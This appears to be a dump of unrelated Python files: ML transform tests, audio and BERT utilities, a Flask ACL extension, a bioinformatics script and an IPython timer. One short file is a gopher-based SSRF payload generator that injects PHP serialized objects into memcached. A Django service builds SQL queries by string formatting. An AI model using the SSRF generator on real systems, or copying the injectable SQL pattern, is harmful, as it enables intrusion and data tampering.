    def init(self, request):
        request.cls.transform_1 = Batchify() >> (plus_one >> times_two) >> times_two
        request.cls.transform_2 = Batchify() >> plus_one >> (times_two >> times_two)

    def test_device_check(self):
        self.transform_1.pd_to('gpu')
        self.transform_1.transforms[1].pd_to('cpu')
        assert self.transform_1.pd_forward_device_check()
        self.transform_2.pd_to('gpu')
        assert self.transform_2.pd_forward_device_check()


class TestClassTransform:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = transform(SimpleClass)(2)
        request.cls.transform_2 = SimpleClassTransform(2)
        dic = {s: i for i, s in enumerate('abcdefghijklmnop')}
        request.cls.transform_3 = ClassLookup(dic=value(dic))
        request.cls.dic = dic

    def test_infer_apply(self):
        assert self.transform_1.infer_apply(1) == 3
        assert self.transform_2.infer_apply(1) == 3
        assert self.transform_3.infer_apply('abc') == [0, 1, 2]

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test')
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply(1) == 3
        self.transform_2.pd_save(tmp_path / 'test.padl', True)
        t2 = pd.load(tmp_path / 'test.padl')
        assert t2.infer_apply(1) == 3
        self.transform_3.pd_save(tmp_path / 'test.padl', True)
        t3 = pd.load(tmp_path / 'test.padl')
        assert t3.dic == self.dic
        assert t3.infer_apply('abc') == [0, 1, 2]

    def test_stored_arguments(self):
        c = ClassTransformWithManyArguments(1, 2, 3, 4, 5)
        assert c._pd_arguments == OrderedDict([('a', 1), ('b', 2), ('args', (3, 4, 5))])


class TestTorchModuleTransform:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = Polynomial(2, 3)
        request.cls.transform_2 = \
            Polynomial(2, 3, pd_save_options={'torch.nn.Module': 'no-save'})

    def test_output(self):
        output = self.transform_1(1)
        assert output == 2

    def test_infer_apply(self):
        assert self.transform_1.infer_apply(1)

    def test_device(self):
        self.transform_1.pd_to('cpu')
        device = next(self.transform_1.pd_layers[0].parameters()).device.type
        assert device == 'cpu'

    def test_pd_layers(self):
        assert len(self.transform_1.pd_layers) > 0

    def test_pd_parameters(self):
        params = list(self.transform_1.pd_parameters())
        assert len(params) == 2

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test.padl')
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply(1) == 2

    def test_pd_save_with_options(self, tmp_path, capsys, ignore_padl_requirement):
        self.transform_2.pd_save(tmp_path / 'test.padl')
        print(tmp_path / 'test.padl')
        assert not os.path.exists((tmp_path / 'test.padl') / '0.pt')
        pd.load(tmp_path / 'test.padl')
        out, err = capsys.readouterr()
        assert 'loading torch module from' not in out


class TestTorchModuleTransformWithJit:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        # transform wrapped around torch.jit.script
        request.cls.jit_1 = transform(torch.jit.script(PolynomialClass(2, 3)))
        request.cls.compose_1 = transform(lambda x: x + 1) >> batch >> self.jit_1

    def test_type(self):
        assert isinstance(self.jit_1, pd.Transform)
        assert isinstance(self.compose_1, pd.Transform)

    def test_output(self):
        assert self.jit_1(torch.tensor(1)) == torch.tensor(2)

    def test_infer_apply(self):
        assert self.jit_1.infer_apply(torch.tensor(1)) == torch.tensor(2)
        assert self.compose_1.infer_apply(torch.tensor(0)) == torch.tensor(2)

    def test_eval_apply(self):
        assert list(self.jit_1.eval_apply(torch.tensor([1])))[0] == torch.tensor([2])
        assert list(self.compose_1.eval_apply(torch.tensor([0])))[0] == torch.tensor([2])

    def test_device(self):
        self.jit_1.pd_to('cpu')
        device = next(self.jit_1.pd_layers[0].parameters()).device.type
        assert device == 'cpu'

    def test_pd_layers(self):
        assert len(self.jit_1.pd_layers) > 0

    def test_pd_parameters(self):
        assert len(list(self.jit_1.pd_parameters())) == 2

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.jit_1.pd_save(tmp_path / 'test.padl')
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply(torch.tensor(1)) == torch.tensor(2)
        self.compose_1.pd_save(tmp_path / 'test.padl', True)
        compose_1 = pd.load(tmp_path / 'test.padl')
        assert compose_1.infer_apply(torch.tensor(0)) == torch.tensor(2)

    def test_methods(self):
        diff = set(dir(pd.TorchModuleTransform)) - set(dir(self.jit_1))
        assert len(diff) == 0


class TestClassInstance:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = transform(SimpleClass(1))
        request.cls.transform_2 = transform(PolynomialClass(1, 2))

    def test_wrap(self):
        assert isinstance(self.transform_1, SimpleClass)
        assert isinstance(self.transform_1, pd.Transform)
        assert isinstance(self.transform_2, PolynomialClass)
        assert isinstance(self.transform_2, pd.Transform)

    def test_infer_apply(self):
        assert self.transform_1.infer_apply(1) == 2
        assert self.transform_2.infer_apply(1) == 2

    def test_eval_apply(self):
        assert list(self.transform_1.eval_apply([1])) == [2]
        assert list(self.transform_2.eval_apply([2])) == [6]

    def test_train_apply(self):
        assert list(self.transform_1.train_apply([1])) == [2]
        assert list(self.transform_2.train_apply([2])) == [6]

    def test_print(self):
        assert str(self.transform_1)
        assert str(self.transform_2)

    def test_pd_layers(self):
        assert len(self.transform_2.pd_layers) > 0

    def test_pd_parameters(self):
        params = list(self.transform_2.pd_parameters())
        assert len(params) == 2

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test.padl')
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply(1) == 2
        self.transform_2.pd_save(tmp_path / 'test.padl', True)
        t2 = pd.load(tmp_path / 'test.padl')
        assert t2.infer_apply(1) == 2

    def test_long_list(self):
        import tests.material.long_list


class TestComposeWithComments:
    def test_lambda_1(self):
        # should not fail
        t = (
            transform(lambda x: x)  #
            >> transform(lambda x: x)
        )

    def test_lambda_2(self):
        # should not fail
        t = (
            transform(lambda x: x)
            #
            >> transform(lambda x: x)
        )

    def test_identity(self):
        # should not fail
        t = (
            Identity()  #
            >> transform(lambda x: x)
        )

    def test_function_1(self, tmp_path, ignore_padl_requirement):
        t = (
            Identity()  #
            >> transform(simple_func)
        )
        t.pd_save(tmp_path)

    def test_function_2(self, tmp_path, ignore_padl_requirement):
        t = (
            Identity()
            #
            >> transform(simple_func)
        )
        t.pd_save(tmp_path)


class TestAssertNoDoubleBatch:
    def test_double_1(self):
        with pytest.raises(AssertionError):
            t = plus_one >> batch >> batch
            t.pd_forward

    def test_double_2(self):
        with pytest.raises(AssertionError):
            t = plus_one >> plus_one + batch >> plus_one >> batch >> plus_one
            t.pd_forward

    def test_double_3(self):
        with pytest.raises(AssertionError):
            t = plus_one >> plus_one + batch >> plus_one >> batch + plus_one >> plus_one
            t.pd_forward

    def test_double_4(self):
        with pytest.raises(AssertionError):
            t = plus_one >> plus_one / batch >> batch + plus_one >> plus_one
            t.pd_forward

    def test_no_double(self):
        t = plus_one >> plus_one / batch >> batch / plus_one >> plus_one
        t.pd_forward


class TestTrace:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        emb = transform(torch.nn.Embedding)(10, 8)
        linear = transform(torch.nn.Linear)(4, 4)
        to_tensor = transform(lambda x: torch.LongTensor(x))
        request.cls.pipeline = to_tensor >> batch >> emb >> linear

    def test_pd_trace(self):
        try:
            list(self.pipeline.train_apply([[9, 8, 8], [4, 4, 4], [5, 5, 5], [6, 6, 6]],
                                           batch_size=2, num_workers=0))
        except:
            from padl.transforms import _pd_trace
            assert len(_pd_trace) == 3
            assert _pd_trace[0].error_position == 0
            assert torch.equal(_pd_trace[1].args, torch.LongTensor([[9, 8, 8], [4, 4, 4]]))
            assert _pd_trace[1].error_position == 1
            assert _pd_trace[1].pd_mode == 'train'
            assert _pd_trace[2].args == [[9, 8, 8], [4, 4, 4]]


def test_identity_compose_saves(tmp_path, ignore_padl_requirement):
    t = padl.identity >> padl.identity
    t.pd_save(tmp_path / 'test')


class TestParam:
    def test_param_works(self, tmp_path, ignore_padl_requirement):
        x = padl.param(1, 'x')
        t = SimpleClassTransform(x)
        assert t(1) == 2
        t.pd_save(tmp_path / 'test.padl')
        t_1 = padl.load(tmp_path / 'test.padl')
        assert t_1(1) == 2
        t_2 = padl.load(tmp_path / 'test.padl', x=2)
        assert t_2(1) == 3

    def test_no_default(self, tmp_path, ignore_padl_requirement):
        x = padl.param(1, 'x', use_default=False)
        t = SimpleClassTransform(x)
        assert t(1) == 2
        t.pd_save(tmp_path / 'test.padl')
        with pytest.raises(ValueError):
            padl.load(tmp_path / 'test.padl')
        t_2 = padl.load(tmp_path / 'test.padl', x=2)
        assert t_2(1) == 3

    def test_wrong_param(self, tmp_path, ignore_padl_requirement):
        x = padl.param(1, 'x')
        t = SimpleClassTransform(x)
        assert t(1) == 2
        t.pd_save(tmp_path / 'test.padl')
        with pytest.raises(ValueError):
            padl.load(tmp_path / 'test.padl', y=1)
        t_2 = padl.load(tmp_path / 'test.padl', x=2)
        assert t_2(1) == 3


def test_device_check_in_init_works():
    from tests.material.transforms_in_module import DeviceCheckInInit
    t = SimpleClassTransform(1)
    DeviceCheckInInit(t >> t >> batch >> t)  # should not cause an error


def test_failing_save_doesnt_overwrite(tmp_path, ignore_padl_requirement):
    @transform
    def f(x):
        ...

    pd.save(f, tmp_path)

    @transform
    class X:
        def pre_save(self, *args, **kwargs):
            # this will crash saving
            1 / 0

    with pytest.raises(ZeroDivisionError):
        pd.save(X(), tmp_path, force_overwrite=True)  # doesn't work
    assert load(str(tmp_path) + '.padl')._pd_call == 'f'  # location still contains f


def test_successful_save_overwrites(tmp_path, ignore_padl_requirement):
    @transform
    def f(x):
        ...

    pd.save(f, tmp_path)

    @transform
    class X:
        ...

    pd.save(X(), tmp_path, force_overwrite=True)  # works
    assert load(str(tmp_path) + '.padl')._pd_call == 'X()'  # location contains X


def test_missing_package(tmp_path):
    with pytest.raises(RequirementNotFound) as excinfo:
        plus_one.pd_save(tmp_path / 'test.padl')
    assert excinfo.value.package == 'padl'
    assert str(excinfo.value) == ('Could not find an installed version of "padl", which this '
                                  'Transform depends on. Run with *strict_requirements=False* '
                                  'to ignore.')
438568
from .model import GLAM

__all__ = ['GLAM']

# from .simulation import *
# from .utils import *
# from .components import *
# from .fit import *
438592
import apps.common.func.InitDjango
from apps.common.func.CommonFunc import *
from all_models.models import TbBusinessLine


class BusinessService(object):

    @staticmethod
    def getBusiness():
        return dbModelListToListDict(TbBusinessLine.objects.all())

    @staticmethod
    def getInterfaceListBusinessId(interfaceListSql, protocol="HTTP"):
        if protocol == "HTTP":
            sql = 'SELECT distinct bussinessLineName from (SELECT businessLineId from tb_http_interface WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId ' % interfaceListSql
            result = executeSqlGetDict(sql, [])
            return result
        elif protocol == "DUBBO":
            sql = 'SELECT distinct bussinessLineName from (SELECT businessLineId from tb2_dubbo_interface WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId ' % interfaceListSql
            result = executeSqlGetDict(sql, [])
            return result

    @staticmethod
    def getVersionInterfaceListBusinessId(interfaceListSql, versionName):
        sql = 'SELECT distinct bussinessLineName from (SELECT businessLineId from tb_version_http_interface WHERE versionName="%s" and ( %s)) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId ' % (versionName, interfaceListSql)
        result = executeSqlGetDict(sql, [])
        return result

    @staticmethod
    def getTestCaseListBusinessId(testCaseListSql, protocol="HTTP"):
        if protocol == "HTTP":
            sql = "SELECT distinct bussinessLineName from (SELECT businessLineId from tb_http_testcase WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId " % testCaseListSql
            result = executeSqlGetDict(sql, [])
            return result
        elif protocol == "DUBBO":
            sql = "SELECT distinct bussinessLineName from (SELECT businessLineId from tb2_dubbo_testcase WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId " % testCaseListSql
            result = executeSqlGetDict(sql, [])
            return result

    @staticmethod
    def getVersionTestCaseListBusinessId(testCaseListSql, versionName):
        sql = "SELECT distinct bussinessLineName from (SELECT businessLineId from tb_version_http_testcase WHERE versionName='%s' and (%s) ) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId " % (versionName, testCaseListSql)
        result = executeSqlGetDict(sql, [])
        return result

    @staticmethod
    def getAllBusinessLine():
        return TbBusinessLine.objects.filter(state=1)

    @staticmethod
    def getBusinessLineNameById(id):
        return TbBusinessLine.objects.filter(id=id)[0].bussinessLineName


if __name__ == "__main__":
    # print(UserService.getUserByLoginname(UserService.getUsers()[0].loginname))
    print(dbModelListToListDict(BusinessService.getBusiness()))
438596
import os
import math
import sys
import time

import torch
import torch.nn as nn
import torch.nn.functional as F
import torchaudio
import torchaudio.functional as AF
import librosa
import numpy as np

from conf.feature import *
from conf.inference import *


def align(a, b, dim):
    return a.transpose(0, dim)[:b.shape[dim]].transpose(0, dim)


def get_fft_window():
    fft_window = librosa.filters.get_window(WINDOW, WINDOW_SIZE, fftbins=True)
    fft_window = librosa.util.pad_center(fft_window, N_FFT)
    return torch.from_numpy(fft_window)


FFT_WINDOW = get_fft_window()


def onehot_tensor(x, dim=0, classes_num=NOTES_NUM):
    x = x.unsqueeze(dim)
    shape = list(x.shape)
    shape[dim] = classes_num
    y = torch.zeros(shape).to(x.device).scatter_(dim, x, 1)
    return y


def spec2wav(x, cos, sin, wav_len, syn_phase=0, device="cuda"):
    '''
    args: channels * frames * n_fft
    '''
    x = F.pad(x, (0, 1), "constant", 0)
    fft_window = FFT_WINDOW.cuda() if device == "cuda" else FFT_WINDOW
    if syn_phase == 1:
        print("here")
        wav_len = int((x.shape[-2] - 1) / FRAMES_PER_SEC * SAMPLE_RATE)
        wav = AF.griffinlim(x.transpose(1, 2), window=fft_window, n_fft=N_FFT,
                            hop_length=HOP_SIZE, win_length=WINDOW_SIZE, power=1,
                            normalized=False, length=wav_len, n_iter=N_ITER,
                            momentum=0, rand_init=False)
    elif syn_phase == 2:
        itersNum = 100
        for i in range(itersNum):
            spec = torch.stack([x * cos, x * sin], -1).transpose(1, 2)
            wav = torch.istft(spec, n_fft=N_FFT, hop_length=HOP_SIZE,
                              win_length=WINDOW_SIZE, window=fft_window, center=True,
                              normalized=False, onesided=None, length=wav_len,
                              return_complex=False)
            if i < itersNum - 1:
                _, cos, sin = wav2spec(wav)
    elif syn_phase == 0:
        spec = torch.stack([x * cos, x * sin], -1).transpose(1, 2)
        wav = torch.istft(spec, n_fft=N_FFT, hop_length=HOP_SIZE,
                          win_length=WINDOW_SIZE, window=fft_window, center=True,
                          normalized=False, onesided=None, length=wav_len,
                          return_complex=False)
    return wav


def wav2spec(x, device="cuda"):
    '''
    return channel * frames * n_fft
    '''
    fft_window = FFT_WINDOW.cuda() if device == "cuda" else FFT_WINDOW
    spec = torch.stft(x, N_FFT, hop_length=HOP_SIZE, win_length=WINDOW_SIZE,
                      window=fft_window, center=True, pad_mode='reflect',
                      normalized=False, onesided=None, return_complex=False)
    spec = spec.transpose(1, 2)
    real = spec[:, :, :, 0]
    imag = spec[:, :, :, 1]
    mag = (real ** 2 + imag ** 2) ** 0.5
    cos = real / torch.clamp(mag, 1e-10, np.inf)
    sin = imag / torch.clamp(mag, 1e-10, np.inf)
    return mag[:, :, :-1], cos, sin


def save_audio(wav, path):
    torchaudio.save(path, wav.float().cpu(), SAMPLE_RATE)


def devide_into_batches(x, pad_value=0, overlap_edge=PAD_FRAME, duration_axis=-1):
    x = x.unsqueeze(0).unsqueeze(-1)
    duration_axis = duration_axis - 1 if duration_axis < 0 else duration_axis + 1
    x = x.transpose(duration_axis, -1)
    frames_num = x.shape[-1]
    batch_frames_num_non_padding = BATCH_FRAMES_NUM - overlap_edge * 2
    segments_num = frames_num // batch_frames_num_non_padding
    if pad_value == -1:
        x = x[:segments_num * batch_frames_num_non_padding]
    elif segments_num * batch_frames_num_non_padding < frames_num:
        x = F.pad(x, (0, int((segments_num + 1) * batch_frames_num_non_padding) - frames_num),
                  'constant', value=pad_value)
        segments_num += 1
    x = F.pad(x, (overlap_edge, overlap_edge), 'constant', value=pad_value)
    x = x.transpose(-1, 0)
    samples = []
    for i in range(segments_num):
        st = i * batch_frames_num_non_padding
        ed = st + BATCH_FRAMES_NUM
        sample = x[st:ed].transpose(0, duration_axis).squeeze(0).squeeze(-1)
        samples.append(sample)
    batches = []
    samples_num = len(samples)
    batches_num = (samples_num + INFERENCE_BATCH_SIZE - 1) // INFERENCE_BATCH_SIZE
    for i in range(batches_num):
        st = i * INFERENCE_BATCH_SIZE
        ed = st + INFERENCE_BATCH_SIZE
        ed = samples_num if ed > samples_num else ed
        batches.append(torch.stack(samples[st:ed], 0))
    return batches


def merge_batches(x, overlap_edge=PAD_FRAME, duration_axis=-1):
    if duration_axis >= 0:
        duration_axis += 1
    x = x.unsqueeze(0).transpose(0, duration_axis)
    if duration_axis >= 0:
        duration_axis -= 1
    x = x[overlap_edge:-overlap_edge].transpose(0, 1).flatten(0, 1).transpose(0, duration_axis).squeeze(0)
    return x


def merge_from_list(x, index=0):
    results = []
    for unit in x:
        if type(unit) in [tuple, list]:
            results.append(unit[index])
        else:
            results.append(unit)
    return torch.cat(results, 0)
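
# A minimal round-trip sketch (assumes the constants imported from
# conf.feature above -- WINDOW, N_FFT, HOP_SIZE, SAMPLE_RATE, etc. -- are
# defined, and that `wav` is a (channels, samples) float tensor on CPU):
#
#     mag, cos, sin = wav2spec(wav, device="cpu")
#     rec = spec2wav(mag, cos, sin, wav.shape[-1], syn_phase=0, device="cpu")
#     save_audio(rec, "roundtrip.wav")
#
# With syn_phase=0 the original phase (cos/sin) is reused, so `rec` should
# match `wav` up to STFT edge effects; syn_phase=1 re-estimates the phase
# with Griffin-Lim instead.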
438604
import torch
import json
import numpy as np
from transformers import (BertForMaskedLM, BertTokenizer)

modelpath = 'bert-large-uncased-whole-word-masking/'
tokenizer = BertTokenizer.from_pretrained(modelpath)
model = BertForMaskedLM.from_pretrained(modelpath)
model.eval()

id_of_mask = 103


def get_embeddings(sentence):
    with torch.no_grad():
        processed_sentence = '' + sentence + ''
        tokenized = tokenizer.encode(processed_sentence)
        input_ids = torch.tensor(tokenized).unsqueeze(0)  # Batch size 1
        outputs = model(input_ids)
        index_of_mask = tokenized.index(id_of_mask)
        # batch, tokens, vocab_size
        prediction_scores = outputs[0]
        return prediction_scores[0][index_of_mask].cpu().numpy().tolist()


def get_embedding_group(tokens):
    print(tokens)
    mutated = []
    for i, v in enumerate(tokens):
        array = tokens.copy()
        array[i] = id_of_mask
        mutated.append(array)
    print('Running model')
    output = model(torch.tensor(mutated))[0]
    print('Converting to list')
    array = output.detach().numpy().tolist()
    print('Constructing out array')
    # only grab mask embedding
    # can probably do this in torch? not sure how
    out = []
    for i, v in enumerate(array):
        out.append(v[i])
    return out


def get_embedding_group_top(tokens):
    sents = get_embedding_group(tokens)
    out = []
    print('get_embedding_group done')
    for sent_i, sent in enumerate(sents):
        all_tokens = []
        for i, v in enumerate(sent):
            all_tokens.append({'i': i, 'v': float(v)})
        all_tokens.sort(key=lambda d: d['v'], reverse=True)
        topTokens = all_tokens[:90]
        sum = np.sum(np.exp(sent))
        for i, token in enumerate(topTokens):
            token['p'] = float(np.exp(token['v']) / sum)
        out.append(all_tokens[:90])
    return out


# Runs one token at a time to stay under memory limit
def get_embedding_group_low_mem(tokens):
    print(tokens)
    out = []
    for index_of_mask, v in enumerate(tokens):
        array = tokens.copy()
        array[index_of_mask] = id_of_mask
        input_ids = torch.tensor(array).unsqueeze(0)
        prediction_scores = model(input_ids)[0]
        out.append(prediction_scores[0][index_of_mask].detach().numpy())
    return out


def get_embedding_group_top_low_mem(tokens):
    sents = get_embedding_group_low_mem(tokens)
    out = []
    print('get_embedding_group done')
    for sent_i, sent in enumerate(sents):
        all_tokens = []
        for i, v in enumerate(sent):
            all_tokens.append({'i': i, 'v': float(v)})
        all_tokens.sort(key=lambda d: d['v'], reverse=True)
        topTokens = all_tokens[:90]
        sum = np.sum(np.exp(sent))
        for i, token in enumerate(topTokens):
            token['p'] = float(np.exp(token['v']) / sum)
        out.append(all_tokens[:90])
    return out


import os
import shutil

# Free up memory
if os.environ.get('REMOVE_WEIGHTS') == 'TRUE':
    print('removing bert-large-uncased-whole-word-masking from filesystem')
    shutil.rmtree('bert-large-uncased-whole-word-masking', ignore_errors=True)
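
# A minimal sanity-check sketch (assumes the local weight directory above
# loaded successfully; the example sentence is arbitrary):
if __name__ == '__main__':
    token_ids = tokenizer.encode('The cat sat on the mat')
    top = get_embedding_group_top_low_mem(token_ids)
    # `top` holds, per masked position, the highest-scoring vocabulary ids
    # with softmax probabilities; decode the top guess for position 1:
    print(tokenizer.convert_ids_to_tokens([top[1][0]['i']]))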
438613
from __future__ import absolute_import

import functools
import logging
from pprint import pformat
from urllib import urlencode

import flask
from flask import request, current_app
from flask_login import current_user
import werkzeug as wz

from flask_acl.core import iter_object_acl, get_object_context, check
from flask_acl.permission import default_permission_sets
from flask_acl.predicate import default_predicates

log = logging.getLogger(__name__)


class _Redirect(Exception):
    pass


class ACLManager(object):

    """Flask extension for registration and checking of ACLs on routes and other objects."""

    login_view = 'login'

    def __init__(self, app=None):
        self.context_processors = []
        self.predicates = default_predicates.copy()
        self.predicate_parsers = []
        self.permission_sets = default_permission_sets.copy()
        self.permission_set_parsers = []
        if app:
            self.init_app(app)

    def init_app(self, app):
        app.acl_manager = self
        app.extensions['acl'] = self
        app.config.setdefault('ACL_ROUTE_DEFAULT_STATE', True)
        # I suspect that Werkzeug has something for this already...
        app.errorhandler(_Redirect)(lambda r: flask.redirect(r.args[0]))

    def context_processor(self, func):
        """Register a function to build authorization contexts.

        The function is called with no arguments, and must return a dict of
        new context material.

        """
        self.context_processors.append(func)

    def predicate_parser(self, func):
        """Define a new predicate parser. E.g.::

            @authz.predicate_parser
            def parse_groups(pred):
                if pred.startswith('group:'):
                    return Group(pred.split(':')[1])

        """
        self.predicate_parsers.append(func)

    def permission_set_parser(self, func):
        """Define a new permission set parser. E.g.::

            @authz.permission_set_parser
            def parse_globs(pattern):
                if '*' in pattern:
                    reobj = re.compile(fnmatch.translate(pattern))
                    return reobj.match

        """
        self.permission_set_parsers.append(func)

    def predicate(self, name, func=None):
        """Define a new predicate (directly, or as a decorator). E.g.::

            @authz.predicate('ROOT')
            def is_root(user, **ctx):
                # return True if user is in group "wheel".

        """
        if func is None:
            return functools.partial(self.predicate, name)
        self.predicates[name] = func
        return func

    def permission_set(self, name, func=None):
        """Define a new permission set (directly, or as a decorator). E.g.::

            @authz.permission_set('HTTP')
            def is_http_perm(perm):
                return perm.startswith('http.')

        """
        if func is None:
            return functools.partial(self.permission_set, name)
        self.permission_sets[name] = func
        return func

    def route_acl(self, *acl, **options):
        """Decorator to attach an ACL to a route.

        E.g::

            @app.route('/url/to/view')
            @authz.route_acl('''
                ALLOW WHEEL ALL
                DENY  ANY   ALL
            ''')
            def my_admin_function():
                pass

        """

        def _route_acl(func):

            func.__acl__ = acl

            @functools.wraps(func)
            def wrapped(*args, **kwargs):
                permission = 'http.' + request.method.lower()
                local_opts = options.copy()
                local_opts.setdefault('default', current_app.config['ACL_ROUTE_DEFAULT_STATE'])
                self.assert_can(permission, func, **local_opts)
                return func(*args, **kwargs)

            return wrapped
        return _route_acl

    def can(self, permission, obj, **kwargs):
        """Check if we can do something with an object.

        :param permission: The permission to look for.
        :param obj: The object to check the ACL of.
        :param **kwargs: The context to pass to predicates.

        >>> auth.can('read', some_object)
        >>> auth.can('write', another_object, group=some_group)

        """
        context = {'user': current_user}
        for func in self.context_processors:
            context.update(func())
        context.update(get_object_context(obj))
        context.update(kwargs)
        return check(permission, iter_object_acl(obj), **context)

    def assert_can(self, permission, obj, **kwargs):
        """Make sure we have a permission, or abort the request.

        :param permission: The permission to look for.
        :param obj: The object to check the ACL of.
        :param flash: The message to flash if denied (keyword only).
        :param stealth: Abort with a 404? (keyword only).
        :param **kwargs: The context to pass to predicates.

        """
        flash_message = kwargs.pop('flash', None)
        stealth = kwargs.pop('stealth', False)
        default = kwargs.pop('default', None)

        res = self.can(permission, obj, **kwargs)
        res = default if res is None else res

        if not res:
            if flash_message and not stealth:
                flask.flash(flash_message, 'danger')
            if current_user.is_authenticated():
                if flash_message is not False:
                    flask.flash(flash_message or 'You are not permitted to "%s" this resource' % permission)
                flask.abort(403)
            elif not stealth and self.login_view:
                if flash_message is not False:
                    flask.flash(flash_message or 'Please login for access.')
                raise _Redirect(flask.url_for(self.login_view) + '?' + urlencode(dict(
                    next=flask.request.script_root + flask.request.path
                )))
            else:
                flask.abort(404)

    def can_route(self, endpoint, method=None, **kwargs):
        """Make sure we can route to the given endpoint or url.

        This checks for `http.get` permission (or other methods) on the ACL of
        route functions, attached via the `ACL` decorator.

        :param endpoint: A URL or endpoint to check for permission to access.
        :param method: The HTTP method to check; defaults to `'GET'`.
        :param **kwargs: The context to pass to predicates.

        """
        view = flask.current_app.view_functions.get(endpoint)
        if not view:
            endpoint, args = flask._request_ctx.top.match(endpoint)
            view = flask.current_app.view_functions.get(endpoint)
        if not view:
            return False
        return self.can('http.' + (method or 'GET').lower(), view, **kwargs)
438618
import urllib


def PHPMemcached():
    print "\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n" + "\033[0m"
    code = raw_input("\033[96m" + "Give serialization payload\nexample: O:5:\"Hello\":0:{} : " + "\033[0m")
    if(not code):
        print "\033[93m" + "Plz give payload" + "\033[0m"
        exit()
    payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
    finalpayload = urllib.quote_plus(payload).replace("+", "%20").replace("%2F", "/").replace("%25", "%").replace("%3A", ":")
    print "\033[93m" + "\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
    print "\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m"
    print "\033[93m" + "\nAfter everything done, you can delete memcached item by using this payload: \n" + "\033[0m"
    print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a" + "\033[0m"
    print "\n" + "\033[41m" + "-----------Made-by-SpyD3r-----------" + "\033[0m"
438654
import io, sys, os, csv
from Bio import SeqIO
from selftarget.oligo import loadPamLookup, loadOligosByBarcode, getFileForOligoIdx


def closeFiles(fhandles):
    for id in fhandles:
        fhandles[id].close()


def writeBatchToFile(read_by_file, output_dir):
    for (filedir, filename) in read_by_file:
        if not os.path.isdir(output_dir + '/' + filedir):
            os.mkdir(output_dir + '/' + filedir)
        mapfilename = filename[:-6] + '_mappings.txt'
        if mapfilename in os.listdir(output_dir + '/' + filedir):
            fout = io.open(output_dir + '/' + filedir + '/' + mapfilename, 'a')
        else:
            fout = io.open(output_dir + '/' + filedir + '/' + mapfilename, 'w')
        for line in read_by_file[(filedir, filename)]:
            fout.write(u'%s\n' % line)
        fout.close()


if __name__ == '__main__':

    if len(sys.argv) != 2 and len(sys.argv) != 3:
        print('split_null_mappings.py <high_dir> <(opt)map_dir_ext>')
    else:
        highdir = sys.argv[1]
        map_dir_ext = sys.argv[2] if len(sys.argv) >= 3 else ''
        mapping_dir = '/mapping_files%s/' % map_dir_ext
        map_dir = '/mapped_reads%s/' % map_dir_ext
        if not os.path.isdir(highdir + '/' + map_dir):
            os.mkdir(highdir + '/' + map_dir)
        mapping_files = os.listdir(highdir + mapping_dir)
        total, assigned = 0, 0
        for mapfile in mapping_files:
            fastq_file = mapfile[:-13] + '.fastq'
            batch = 0
            read_by_file = {}
            batch_size = 10000
            f = io.open(highdir + mapping_dir + mapfile)
            rdr = csv.reader(f, delimiter='\t')
            for toks in rdr:
                if '@@@' in toks[0]:
                    continue
                oligo_id = toks[1].split()[0]
                batch += 1
                total += 1
                if oligo_id == 'None':
                    continue
                if ',' in oligo_id:
                    continue  # Ignore ambiguously mapped reads
                # parse the numeric index directly instead of eval-ing data
                oligo_idx = int(oligo_id[5:].split('_')[0])
                filepath, filename = getFileForOligoIdx(oligo_idx)
                if (filepath, filename) not in read_by_file:
                    read_by_file[(filepath, filename)] = []
                read_by_file[(filepath, filename)].append('\t'.join(toks))
                assigned += 1
                if batch >= batch_size:
                    writeBatchToFile(read_by_file, highdir + map_dir)
                    batch = 0
                    read_by_file = {}
            f.close()
            if batch > 0:
                writeBatchToFile(read_by_file, highdir + map_dir)
        print('Total records:', total)
        print('Total assigned:', assigned)
438666
from __future__ import print_function

from ._version import version as __version__

from time import strftime, localtime

try:
    from time import monotonic
except ImportError:
    from monotonic import monotonic

from IPython.core.magics.execution import _format_time as format_delta


def format_timestamp(struct_time):
    timestamp = strftime('%Y-%m-%d %H:%M:%S %z', struct_time)
    # add colon in %z (for datetime.fromisoformat, stackoverflow.com/q/44836581)
    return '{}:{}'.format(timestamp[:-2], timestamp[-2:])


class LineWatcher(object):
    """Class that implements a basic timer.

    Notes
    -----
    * Register the `start` and `stop` methods with the IPython events API.
    """
    __slots__ = ['start_time', 'timestamp']

    def start(self):
        self.timestamp = localtime()
        self.start_time = monotonic()

    def stop(self):
        delta = monotonic() - self.start_time
        print(u'time: {} (started: {})'.format(
            format_delta(delta),
            format_timestamp(self.timestamp),
        ))


timer = LineWatcher()
start = timer.start
stop = timer.stop


def load_ipython_extension(ip):
    start()
    ip.events.register('pre_run_cell', start)
    ip.events.register('post_run_cell', stop)


def unload_ipython_extension(ip):
    ip.events.unregister('pre_run_cell', start)
    ip.events.unregister('post_run_cell', stop)
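
# Usage note: this module is the `autotime` IPython extension; in an IPython
# session it is enabled with the standard extension machinery, e.g.
#
#     %load_ext autotime
#
# after which every executed cell prints a line like
#
#     time: 1.13 ms (started: 2021-01-01 12:00:00 +00:00)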
438667
